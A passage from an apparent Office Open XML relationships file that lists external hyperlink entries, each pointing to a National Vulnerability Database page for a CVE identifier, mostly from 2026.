Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100380" TargetMode="External" Id="rId340" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100381" TargetMode="External" Id="rId341" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100418" TargetMode="External" Id="rId342" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100526" TargetMode="External" Id="rId343" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100527" TargetMode="External" Id="rId344" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100533" TargetMode="External" Id="rId345" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100545" TargetMode="External" Id="rId346" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100548" TargetMode="External" Id="rId347" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100571" TargetMode="External" Id="rId348" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100572" TargetMode="External" Id="rId349" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45801" TargetMode="External" Id="rId350" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55217" TargetMode="External" Id="rId351" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56728" TargetMode="External" Id="rId352" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56732" TargetMode="External" Id="rId353" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56734" TargetMode="External" Id="rId354" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56735" TargetMode="External" Id="rId355" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61855" TargetMode="External" Id="rId356" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63006" TargetMode="External" Id="rId357" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63206" TargetMode="External" Id="rId358" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63216" TargetMode="External" Id="rId359" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80514" TargetMode="External" Id="rId360" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84460" TargetMode="External" Id="rId361" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85290" TargetMode="External" Id="rId362" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86837" TargetMode="External" Id="rId363" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92799" TargetMode="External" Id="rId364" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93363" TargetMode="External" Id="rId365" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93364" TargetMode="External" Id="rId366" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97864" TargetMode="External" Id="rId367" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100174" TargetMode="External" Id="rId368" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100373" TargetMode="External" Id="rId369" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56726" TargetMode="External" Id="rId370" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-6082" TargetMode="External" Id="rId371" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-6083" TargetMode="External" Id="rId372" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-6084" TargetMode="External" Id="rId373" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-6085" TargetMode="External" Id="rId374" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-6086" TargetMode="External" Id="rId375" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-6087" TargetMode="External" Id="rId376" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-6088" TargetMode="External" Id="rId377" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63205" TargetMode="External" Id="rId378" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63208" TargetMode="External" Id="rId379" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67407" TargetMode="External" Id="rId380" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100502" TargetMode="External" Id="rId381" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17602" TargetMode="External" Id="rId382" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-39372" TargetMode="External" Id="rId383" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100376" TargetMode="External" Id="rId384" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100383" TargetMode="External" Id="rId385" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-27867" TargetMode="External" Id="rId386" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67241" TargetMode="External" Id="rId387" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85292" TargetMode="External" Id="rId388" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85293" TargetMode="External" Id="rId389" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49469" TargetMode="External" Id="rId390" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67406" TargetMode="External" Id="rId391" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80430" TargetMode="External" Id="rId392" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-95834" TargetMode="External" Id="rId393" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67421" TargetMode="External" Id="rId394" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100505" TargetMode="External" Id="rId395" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100305" TargetMode="External" Id="rId396" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100525" TargetMode="External" Id="rId397" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100553" TargetMode="External" Id="rId398" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100583" TargetMode="External" Id="rId399" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100590" TargetMode="External" Id="rId400" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19775" TargetMode="External" Id="rId401" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-6103" TargetMode="External" Id="rId402" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91769" TargetMode="External" Id="rId403" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92829" TargetMode="External" Id="rId404" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97469" TargetMode="External" Id="rId405" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100554" TargetMode="External" Id="rId406" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88848" TargetMode="External" Id="rId407" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78394" TargetMode="External" Id="rId408" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78397" TargetMode="External" Id="rId409" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97896" TargetMode="External" Id="rId410" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97897" TargetMode="External" Id="rId411" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-1218" TargetMode="External" Id="rId412" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100503" TargetMode="External" Id="rId413" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100573" TargetMode="External" Id="rId414" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100417" TargetMode="External" Id="rId415" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100534" TargetMode="External" Id="rId416" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100537" TargetMode="External" Id="rId417" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100542" TargetMode="External" Id="rId418" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97866" TargetMode="External" Id="rId419" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97228" TargetMode="External" Id="rId420" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97721" TargetMode="External" Id="rId421" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100539" TargetMode="External" Id="rId422" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75553" TargetMode="External" Id="rId423" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63204" TargetMode="External" Id="rId424" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65828" TargetMode="External" Id="rId425" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67234" TargetMode="External" Id="rId426" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67420" TargetMode="External" Id="rId427" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92106" TargetMode="External" Id="rId428" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96874" TargetMode="External" Id="rId429" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56729" TargetMode="External" Id="rId430" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56730" TargetMode="External" Id="rId431" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66078" TargetMode="External" Id="rId432" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97884" TargetMode="External" Id="rId433" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97868" TargetMode="External" Id="rId434" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97869" TargetMode="External" Id="rId435" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100070" TargetMode="External" Id="rId436" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100071" TargetMode="External" Id="rId437" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100072" TargetMode="External" Id="rId438" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100073" TargetMode="External" Id="rId439" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100074" TargetMode="External" Id="rId440" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100076" TargetMode="External" Id="rId441" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100077" TargetMode="External" Id="rId442" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100078" TargetMode="External" Id="rId443" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100079" TargetMode="External" Id="rId444" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45234" TargetMode="External" Id="rId445" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45235" TargetMode="External" Id="rId446" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45236" TargetMode="External" Id="rId447" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45237" TargetMode="External" Id="rId448" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45238" TargetMode="External" Id="rId449" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45239" TargetMode="External" Id="rId450" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45240" TargetMode="External" Id="rId451" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45241" TargetMode="External" Id="rId452" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49117" TargetMode="External" Id="rId453" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49118" TargetMode="External" Id="rId454" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-51772" TargetMode="External" Id="rId455" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53971" TargetMode="External" Id="rId456" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53972" TargetMode="External" Id="rId457" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53973" TargetMode="External" Id="rId458" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53990" TargetMode="External" Id="rId459" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57861" TargetMode="External" Id="rId460" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57864" TargetMode="External" Id="rId461" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-60096" TargetMode="External" Id="rId462" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-60097" TargetMode="External" Id="rId463" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-60098" TargetMode="External" Id="rId464" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-60099" TargetMode="External" Id="rId465" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-60100" TargetMode="External" Id="rId466" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-60101" TargetMode="External" Id="rId467" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-7799" TargetMode="External" Id="rId468" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-7800" TargetMode="External" Id="rId469" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86439" TargetMode="External" Id="rId470" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88389" TargetMode="External" Id="rId471" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88420" TargetMode="External" Id="rId472" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92564" TargetMode="External" Id="rId473" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9313" TargetMode="External" Id="rId474" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9652" TargetMode="External" Id="rId475" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9655" TargetMode="External" Id="rId476" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97522" TargetMode="External" Id="rId477" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97526" TargetMode="External" Id="rId478" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97529" TargetMode="External" Id="rId479" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97530" TargetMode="External" Id="rId480" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97532" TargetMode="External" Id="rId481" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97533" TargetMode="External" Id="rId482" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97534" TargetMode="External" Id="rId483" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97535" TargetMode="External" Id="rId484" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97537" TargetMode="External" Id="rId485" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97538" TargetMode="External" Id="rId486" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97539" TargetMode="External" Id="rId487" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97540" TargetMode="External" Id="rId488" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97541" TargetMode="External" Id="rId489" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97542" TargetMode="External" Id="rId490" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97543" TargetMode="External" Id="rId491" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97544" TargetMode="External" Id="rId492" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97545" TargetMode="External" Id="rId493" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97546" TargetMode="External" Id="rId494" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97547" TargetMode="External" Id="rId495" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97549" TargetMode="External" Id="rId496" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97550" TargetMode="External" Id="rId497" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97551" TargetMode="External" Id="rId498" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97552" TargetMode="External" Id="rId499" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97553" TargetMode="External" Id="rId500" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97554" TargetMode="External" Id="rId501" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97556" TargetMode="External" Id="rId502" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97558" TargetMode="External" Id="rId503" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97559" TargetMode="External" Id="rId504" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97560" TargetMode="External" Id="rId505" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97561" TargetMode="External" Id="rId506" /><Relationship 